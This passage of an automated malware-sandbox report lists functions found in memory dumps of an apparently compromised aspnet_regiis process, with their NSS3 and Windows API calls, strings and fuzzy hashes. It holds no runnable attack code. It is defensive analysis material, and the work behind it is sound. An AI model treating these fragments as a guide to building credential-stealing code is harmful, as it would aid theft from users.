                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _freemalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3576935931-0
                                                                                                                                                                              • Opcode ID: e3d159cc30dcafcbc22b9fa8cf466b970993b1121759aaa8067356539080b560
                                                                                                                                                                              • Instruction ID: 1c512a724d965fb6763aa6a8ebdabdc3fbc8baf17aa4abc2e877f27c9523be10
                                                                                                                                                                              • Opcode Fuzzy Hash: e3d159cc30dcafcbc22b9fa8cf466b970993b1121759aaa8067356539080b560
                                                                                                                                                                              • Instruction Fuzzy Hash: A911E732DC0631EBCF396B7CE94475A37A6BF453B0B504C25F8099A250DF35C459CA90
                                                                                                                                                                              Function 6CC12CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CC15B40: PR_GetIdentitiesLayer.NSS3 ref: 6CC15B56
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CC12CEC
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CC12D02
                                                                                                                                                                              • PR_EnterMonitor.NSS3(?), ref: 6CC12D1F
                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CC12D42
                                                                                                                                                                              • PR_ExitMonitor.NSS3(?), ref: 6CC12D5B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1593528140-0
                                                                                                                                                                              • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                              • Instruction ID: 167e8516b06f54cd0990543a7cbec3244d597d3b147c3bba2aac09adc785d83c
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                              • Instruction Fuzzy Hash: F601C4B9A142005BE730AF27FC40BC7B7A5EF46318F008565E85A86F20F632F916D792
                                                                                                                                                                              Function 6CBAAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CB93090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CBAAE42), ref: 6CB930AA
                                                                                                                                                                                • Part of subcall function 6CB93090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB930C7
                                                                                                                                                                                • Part of subcall function 6CB93090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB930E5
                                                                                                                                                                                • Part of subcall function 6CB93090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB93116
                                                                                                                                                                                • Part of subcall function 6CB93090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB9312B
                                                                                                                                                                                • Part of subcall function 6CB93090: PK11_DestroyObject.NSS3(?,?), ref: 6CB93154
                                                                                                                                                                                • Part of subcall function 6CB93090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB9317E
                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CB899FF,?,?,?,?,?,?,?,?,?,6CB82D6B,?), ref: 6CBAAE67
                                                                                                                                                                              • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CB899FF,?,?,?,?,?,?,?,?,?,6CB82D6B,?), ref: 6CBAAE7E
                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB82D6B,?,?,00000000), ref: 6CBAAE89
                                                                                                                                                                              • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CB82D6B,?,?,00000000), ref: 6CBAAE96
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CB82D6B,?,?), ref: 6CBAAEA3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 754562246-0
                                                                                                                                                                              • Opcode ID: 5e5e9397cbb34fa83de87e41b403a2cae10f18602487ec239538d5a6fddd0beb
                                                                                                                                                                              • Instruction ID: 9116024d7e478494668ee23d0494dada9f1a52adcd621bd2dc983dafb6f16302
                                                                                                                                                                              • Opcode Fuzzy Hash: 5e5e9397cbb34fa83de87e41b403a2cae10f18602487ec239538d5a6fddd0beb
                                                                                                                                                                              • Instruction Fuzzy Hash: 3901F4B2F0D1E097E70192ACAC85AAF3158CF8765DF180032E889C7B01F612E9064EF3
                                                                                                                                                                              Function 02A26719 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __getptd.LIBCMT ref: 02A26725
                                                                                                                                                                                • Part of subcall function 02A24954: __getptd_noexit.LIBCMT ref: 02A24957
                                                                                                                                                                                • Part of subcall function 02A24954: __amsg_exit.LIBCMT ref: 02A24964
                                                                                                                                                                              • __getptd.LIBCMT ref: 02A2673C
                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 02A2674A
                                                                                                                                                                              • __lock.LIBCMT ref: 02A2675A
                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 02A2676E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                              • Opcode ID: 6a074085ae163d3c701955f882db400b87b92d206af5a6ae5cd6987c5ae234d7
                                                                                                                                                                              • Instruction ID: b5aab6d444245651be274a2ef4eff580282fe05dc895cbfc1fd662b7b33f1efd
                                                                                                                                                                              • Opcode Fuzzy Hash: 6a074085ae163d3c701955f882db400b87b92d206af5a6ae5cd6987c5ae234d7
                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF09032A86B30DBEA21FF6CAA4575D33A26F01B24F110549E455AA1D0CF245408DE59
                                                                                                                                                                              Function 02A10077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A1009A
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC0D
                                                                                                                                                                                • Part of subcall function 02A2EBF8: __CxxThrowException@8.LIBCMT ref: 02A2EC22
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC33
                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 02A10139
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A1014D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                              • API String ID: 2448322171-3788999226
                                                                                                                                                                              • Opcode ID: 3278031c1b61bb40ce363ceb602bf06075bd6c41f4e1a945387e97790dc0173b
                                                                                                                                                                              • Instruction ID: 417a30a9a33aa24a98189c76e6264111856f7642bcd4deb5f67f0143c396490a
                                                                                                                                                                              • Opcode Fuzzy Hash: 3278031c1b61bb40ce363ceb602bf06075bd6c41f4e1a945387e97790dc0173b
                                                                                                                                                                              • Instruction Fuzzy Hash: 2831D472ED03369BD704EF6C9985BAD77E2AB04320F11466AE920F7240DF74DAD48B40
                                                                                                                                                                              Function 6CB16C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CB16D36
                                                                                                                                                                              Strings
                                                                                                                                                                              • database corruption, xrefs: 6CB16D2A
                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB16D20
                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB16D2F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                                                              • Opcode ID: fbec23f8325c914d8b4657291205f7966c9f8d7536bbad7dfc6610f5cde0a353
                                                                                                                                                                              • Instruction ID: 8f9c53fe1950c6ae0cc655463981d5ea9e220735d104593270385ea0df608ebf
                                                                                                                                                                              • Opcode Fuzzy Hash: fbec23f8325c914d8b4657291205f7966c9f8d7536bbad7dfc6610f5cde0a353
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F210371B183559BC710CE1AC841B5AB7F2EF85308F14892CD8499BF51E771F949CB92
                                                                                                                                                                              Function 6CC4CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC4CC7B), ref: 6CC4CD7A
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC4CD8E
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC4CDA5
                                                                                                                                                                                • Part of subcall function 6CC4CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC4CDB8
                                                                                                                                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CC4CCB5
                                                                                                                                                                              • memcpy.VCRUNTIME140(6CCE14F4,6CCE02AC,00000090), ref: 6CC4CCD3
                                                                                                                                                                              • memcpy.VCRUNTIME140(6CCE1588,6CCE02AC,00000090), ref: 6CC4CD2B
                                                                                                                                                                                • Part of subcall function 6CB69AC0: socket.WSOCK32(?,00000017,6CB699BE), ref: 6CB69AE6
                                                                                                                                                                                • Part of subcall function 6CB69AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CB699BE), ref: 6CB69AFC
                                                                                                                                                                                • Part of subcall function 6CB70590: closesocket.WSOCK32(6CB69A8F,?,?,6CB69A8F,00000000), ref: 6CB70597
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                              • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                              • API String ID: 1231378898-412307543
                                                                                                                                                                              • Opcode ID: ab15a49c68c03c080cece5da68d3d574f348cc5239932948624f3bcdec452950
                                                                                                                                                                              • Instruction ID: e0220f9786dcbe37eb23d5301015eb8c038780541f85f697fffc3b9039455847
                                                                                                                                                                              • Opcode Fuzzy Hash: ab15a49c68c03c080cece5da68d3d574f348cc5239932948624f3bcdec452950
                                                                                                                                                                              • Instruction Fuzzy Hash: 1D1166F2B022405EDB909F9E9C477563AB8934F258F145029E51ACBB53F771C464CBD2
                                                                                                                                                                              Function 02A0F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F282
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC0D
                                                                                                                                                                                • Part of subcall function 02A2EBF8: __CxxThrowException@8.LIBCMT ref: 02A2EC22
                                                                                                                                                                                • Part of subcall function 02A2EBF8: std::exception::exception.LIBCMT ref: 02A2EC33
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F28D
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                                                                                              • Opcode ID: defca62b69fa2848d34a32c029b308418d1b4d2e22dd5c24e911e43e8a6070ea
                                                                                                                                                                              • Instruction ID: 510ad633217c170f120dc4d00d868685242822e892c9f610a966e0f19b4b031e
                                                                                                                                                                              • Opcode Fuzzy Hash: defca62b69fa2848d34a32c029b308418d1b4d2e22dd5c24e911e43e8a6070ea
                                                                                                                                                                              • Instruction Fuzzy Hash: AAD012B694021C7BEB05E798D9159CDB7E9AB54610F20416AB707D3601EEB066404964
                                                                                                                                                                              Function 02A11D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02A12301,?), ref: 02A11D6C
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A11D73
                                                                                                                                                                              • wsprintfW.USER32 ref: 02A11D84
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateProcesswsprintf
                                                                                                                                                                              • String ID: %hs
                                                                                                                                                                              • API String ID: 769748085-2783943728
                                                                                                                                                                              • Opcode ID: 19cee1cb64a815336a386bfde7617bf4cd1eb44d40d0b592527d4c5bb3ac06d1
                                                                                                                                                                              • Instruction ID: ca5e9fe346f811151b04b0911f97de652dfd923e82d360d2442bfcd9dad32e39
                                                                                                                                                                              • Opcode Fuzzy Hash: 19cee1cb64a815336a386bfde7617bf4cd1eb44d40d0b592527d4c5bb3ac06d1
                                                                                                                                                                              • Instruction Fuzzy Hash: D1D0A731BC031477D61027D5AC0EF9A7F2CEB02BA2F000420FB0ED6140DD71842547D9
                                                                                                                                                                              Function 02A013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02A01402
                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02A0140D
                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 02A01416
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
